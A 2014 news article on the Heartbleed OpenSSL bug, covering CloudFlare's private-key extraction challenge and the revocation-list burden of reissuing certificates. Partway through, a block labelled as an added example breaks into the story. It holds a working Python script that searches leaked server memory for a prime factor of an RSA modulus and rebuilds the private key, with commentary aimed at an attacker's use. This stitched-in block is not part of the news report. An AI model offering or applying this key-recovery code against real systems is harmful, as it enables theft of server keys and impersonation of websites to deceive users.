Fixing the bug, there’s the rub

Heartbleed is a major bug in OpenSSL encryption software that is widely used to secure websites and technology products including mobile phones, data center software and telecommunications equipment.


Published Apr 20, 2014


Washington - Efforts to fix the notorious Heartbleed bug threaten to cause major disruptions to the internet over the next several weeks as companies scramble to repair encryption systems on hundreds of thousands of websites at the same time, security experts say.

Estimates of the severity of the bug’s damage have mounted almost daily since researchers announced the discovery of Heartbleed last week.

What initially seemed like an inconvenient matter of changing passwords for protection now appears much more serious. New revelations suggest that skilled hackers can use the bug to steal a site's private key and then set up fake websites that mimic legitimate ones to trick consumers into handing over personal information.

The sheer scale of the work required to fix this aspect of the bug – which makes it possible to steal the private keys behind the “security certificates” that verify that a website is authentic – could overwhelm the systems designed to keep the internet trustworthy.

“Imagine if we found out all at once that all the doors everybody uses are all vulnerable – they can all get broken into,” said Jason Healey, a cyber security scholar at the Washington-based Atlantic Council. “The kinds of bad things it enables is largely limited only by the imagination of the bad guys.”

The Heartbleed bug put many consumers’ user names and passwords at risk. Undetected for two years, the bug quietly undermined the basic security of the internet by leaving a gap in OpenSSL, an encryption technology used widely by businesses to protect sensitive data.

By some estimates, the bug affected as much as two-thirds of the internet; the flaw prompted thousands of web users to change their passwords on Google, Yahoo, Facebook and other major services.

No examples have surfaced of anyone actually exploiting the vulnerability. But last week, web services company CloudFlare issued an open challenge to hackers to see if Heartbleed could be used to do something really dangerous – steal the private key behind the security certificate that proves Google, for instance, is really Google.

CloudFlare’s initial tests suggested it was probably impossible for an attacker to steal a site’s private key and lure visitors to a duplicate that looked and behaved like the real version.


For the challenge, CloudFlare urged internet users to run their own tests on a dummy server with the Heartbleed bug.

Hackers had to extract the private key from the server, then send a message to CloudFlare that was “signed” with that key in order to prove they had obtained it.

Within nine hours of the challenge’s launch – and three hours after he began working on the problem – a hacker named Fedor Indutny became the first to recover the key.

“It was just a fun way of spending Friday evening time, and a good chance to try my skills in a legal hacking action,” Indutny wrote in an e-mail to the Washington Post.

“After starting a script on a cloud server, I watched a movie and totally forgot about it. Checking the logs in approximately one hour, to my surprise, revealed a private key to me.”

Indutny’s coup was quickly followed by three more successful attempts at recovering the private key. One of the hackers, Ben Murphy, said it took him two hours to retrieve the secret key from CloudFlare’s server.

Stealing the private key is labour intensive. Indutny’s attempt involved making 2.5 million requests of the CloudFlare server before he finally obtained the key. But what was thought to be impossible now turns out to be doable. Websites can indeed be tricked into giving up their identity papers, and those papers can be reused by malicious actors.
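How a leaked buffer turns into a private key, as an added example that is not code from the article, from CloudFlare or from the challenge winners: each Heartbleed response returns up to 64 KB of server memory, and an RSA private key can be rebuilt from a single prime factor of the public modulus. The scan below slides a window over the leaked bytes and tests whether any window divides the modulus. The key size, the little-endian byte layout (how OpenSSL's BIGNUM limbs sit in memory on x86) and the “leaked” buffer are all constructed assumptions for the demonstration; a real attack repeats the request many times and runs this scan over every response.

```python
"""
Recover an RSA private key from leaked server memory by searching the leak
for a prime factor of the public modulus.  Added example for this article;
the key and the "leaked" buffer are constructed here, not a real Heartbleed
response.  Real keys use 1024-bit factors (128-byte windows); the demo uses
256-bit factors so it runs in well under a second in pure Python.
"""
import math
import random

SMALL_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59]


def is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin probabilistic primality test (enough for a demo key)."""
    if n in (2, 3):
        return True
    if n < 2 or n % 2 == 0:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits, rng):
    """Random odd candidate with the top bit set, retried until probably prime."""
    while True:
        c = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(c, rng):
            return c


def make_key(bits, rng, e=65537):
    """Constructed demo RSA key: returns (n, e, d, p, q)."""
    while True:
        p = gen_prime(bits // 2, rng)
        q = gen_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi), p, q


def build_leak(p, width, rng, size=64 * 1024, offset=None):
    """Constructed 'leaked heap': random bytes with the prime p embedded
    somewhere as a little-endian integer (assumed BIGNUM limb layout)."""
    buf = bytearray(rng.getrandbits(size * 8).to_bytes(size, "big"))
    if offset is None:
        offset = rng.randrange(0, size - width)
    buf[offset:offset + width] = p.to_bytes(width, "little")
    return bytes(buf), offset


def find_factor(leak, n, width):
    """Slide a width-byte window over the leak; a window that, read as a
    little-endian integer, divides n is a prime factor of the modulus.
    Returns (factor, offset) or (None, None)."""
    for i in range(len(leak) - width + 1):
        cand = int.from_bytes(leak[i:i + width], "little")
        if 1 < cand < n and n % cand == 0:
            return cand, i
    return None, None


def recover_private_key(leak, n, e, width):
    """Rebuild the private exponent d from one leaked factor, or None."""
    p, _ = find_factor(leak, n, width)
    if p is None:
        return None
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def demo():
    """Generate a key, leak its prime, recover d, and confirm it matches."""
    rng = random.Random(20140420)
    n, e, d, p, _ = make_key(512, rng)
    leak, _ = build_leak(p, 32, rng)
    return recover_private_key(leak, n, e, 32) == d


if __name__ == "__main__":
    print("private key recovered:", demo())
```

The only input the scan needs from the target is the public modulus, which is in the certificate every client already receives; nothing about the leak format has to be parsed. Indutny's 2.5 million requests reflect how rarely a 64 KB slice of heap happens to contain the key material, not any difficulty in recognising it once it appears.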

Changing your passwords will not protect you if you give them unwittingly to a hacker pretending to be your web mail provider.

In the days after Heartbleed was revealed, many websites raced to update their systems. Those fixes plugged the immediate hole so hackers could no longer take advantage of the vulnerability. But in light of this latest discovery, many sites remain exposed: an attacker could have used Heartbleed to steal a site’s private key at any time before the site patched its systems, and patching alone does nothing to invalidate a key that was already taken.

The next step, experts say, is for all 500 000 affected sites to generate new private keys, obtain new security certificates and revoke the old ones. But as necessary as that process is, it could have dramatic consequences for users’ everyday experiences.

When you visit a secure site, your browser checks the site’s security certificate against the issuing authority’s list of revoked certificates (the certificate revocation list, or CRL). Depending on how the browser is designed, it may download that entire list to your computer. Because sites rarely revoke their certificates, the lists are relatively short.

But the Heartbleed exploit now requires hundreds of thousands of sites to add their old certificates to the list, practically overnight. The certificate revocation lists will become bloated with new entries. And browsers will continue to download the now-massive files, according to Paul Mutton, a security consultant at the web services company Netcraft. Checking a site’s identity will take vastly longer.

“If a certificate authority has to revoke 10 000 certificates, that entry will have 10 000 certificates on it,” Mutton said. “And if browsers have to download that… we’re talking hundreds of megabytes.”

It’s roughly the equivalent of having to download 30 minutes’ worth of standard-definition video just to view a single web page.


Healey, of the Atlantic Council, said web security firms were left with two options. The first option is to risk slowing down the web in exchange for greater security. The second option is not much better.

“What’s the other solution? Ask people to be vulnerable for longer? That doesn’t strike me as particularly reasonable,” he said. – Washington Post
